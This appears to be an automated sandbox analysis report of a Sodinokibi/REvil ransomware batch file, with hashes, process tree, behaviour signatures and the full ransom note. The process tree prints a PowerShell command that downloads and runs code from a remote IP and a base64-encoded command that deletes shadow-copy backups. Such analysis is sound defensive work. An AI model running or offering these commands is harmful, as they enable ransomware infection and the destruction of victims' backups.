Analysis

  • max time kernel
    129s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    27-02-2020 15:10

General

  • Target

    AxRJbHcj.bat

  • Size

    191B

  • MD5

    c8057644f33461fab278b0bf3c6a103d

  • SHA1

    5d669ea802108937803c3e530643811de7df3ad6

  • SHA256

    7a29462b5b646f444451bd24baa06480abd3c1a39c33477d1530d1e21f4f7aa6

  • SHA512

    03ac8f9aca2a2ed297a2755c8c1c875ec2eb5b98c2ed7cbab98e51a87bcfc31ed97214636964521adcf8d5475baebea60bde8253b76e38e9fa168d9dab2ff8cf

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/AxRJbHcj

Extracted

Path

C:\54x5b562w7-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 54x5b562w7. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/206011A88ACD6C74 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/206011A88ACD6C74 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: SaPSZV0GmEjz4qEe2oJH1GQ/lBxAucR5mGwjwqfIjmIar+Quz/e185eYJsq/um1A 09aV1DbdkL7atnRq4yr6Fq2kOxe/cE8IJlydHahKUSH4BR5sriXI0wWMMWvnl6SB yNyRwZKnkDzYYmHBVFtRWjCcHHZ1HsNgfzktB8gVAWm1ZrWxQDXshYP+ik77UZZp JJHOFW7k40ZaXH9mcqO0x4RgdBhJvV5z8qvXXKmGjscVwwI9TJkMsHd4v7Xme63s i8FZVtEIH0rwQT5IJo/kfpIVULCQpn/GyVKc3YHeVovo3g/pebAnbsjaBR1wDhhQ 1IhMdj2wcUpRj5KkCI34yssdRKt/qa0k1BSDEglQng76sZ7QoflbW8RqYFGFnAMo sgS0J7DNwGdylxpb1YST/QL8cmYLe0NdRKhWC6w+NqU1a6OSxQxdyNDfE3jx0cLN 1qKIsWfWcMAnHGsAbE/e6jx6EcJiDHRxPfAlx5xT/T6QKLz8DefNHB5BhtPlL7dR ZxbXT+MYczxrPXghw3CK+2j6asSDM0aeC1ad7PjPXcBS+rf2ADr/B7WemyE8r53D sHHoFh2cOfLJn1y0KZvp2nvs79rlEzRUOqYtm0ooUByBi/kRHRqk76yQ0X1Ekzw4 6VNLyzkOaE31r7Vwb9i6Pb8qGA+n/2H5Yg1O9F0E3fs3xw7ECUZk3TXYG2LIeQeN 578iYeWoDWGk3gTXzIwkNAQg84ErCtTbfAmW82uR0t3bhuVBCdUcbax6R73j+Pu9 pVA/TsSGbLCYmnZUB7i9hIBY6YR/HHr/mGzR4pkiNVknyH3LX0xaUQgiKUs96FaH 5WFRV805bnCMuaeccmsOoIQBzjfftqLdmtAM2enDHgUcJr3fbXAjTcPAEX52C43D G0upONpiV4+8DtimZAZ4hJVh3fiWelM/rSv4jAl4KDGCz7eLf6hQmt7bRerEbUoV eBkkZBq5g+r7ogL8X4yCi5X0wlB+C4XTXDJByVosPUJqQuieHU5dA3KiNtbNs96a G0uswfunHSAwZ6Puy+KaGFTbjd0Pq3Faxs9bYHKpdtPIih67KvfWams/+nlnR2lz F0o1njr75Cb6sSFleyYywRAtm64Z4ipij+nHrpkEzOuwECgpkG+bYakLqiwTU0W7 UsP2biTe4jmPZWa5vBnXOBat+LPQo8fsxRj1N/tNKzKOgV4jdCQsxPoja5rDzrEy +4KPWVb7xMsEfmOWADhQBAMvTj1eCm7QMQQxRWncRg6NywLwkGlgkKAhqzxcXasc AxA/U8Z6DTQi40yPaK1dbU7Cd14z8Y+O9Tln2o979lhFwNsO+52g8w== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/206011A88ACD6C74

http://decryptor.cc/206011A88ACD6C74

Signatures

  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 16 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies service 2 TTPs 4 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Blacklisted process makes network request 99 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Drops file in System32 directory 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\AxRJbHcj.bat"
    1⤵
    • Discovering connected drives
    • Suspicious use of WriteProcessMemory
    PID:1868
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/AxRJbHcj');Invoke-ZGEHTGOG;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Sets desktop wallpaper using registry
      • Modifies system certificate store
      • Discovering connected drives
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Drops file in System32 directory
      PID:1892
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Discovering connected drives
        PID:2000
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1544

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_266260b1-506b-46ee-8ffd-f74ade426d58

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_47931ed0-1f3a-4727-b467-1abba254408f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_787e939b-6ce7-4022-b0df-f2cadaf1211f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7b368953-2fc5-4e6c-ac0c-4e9ca5ec1dea

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9adcef47-d90e-41e7-bb27-93604e256a20

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f66dfe3c-3c50-4c57-9265-ac0c7644a88d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms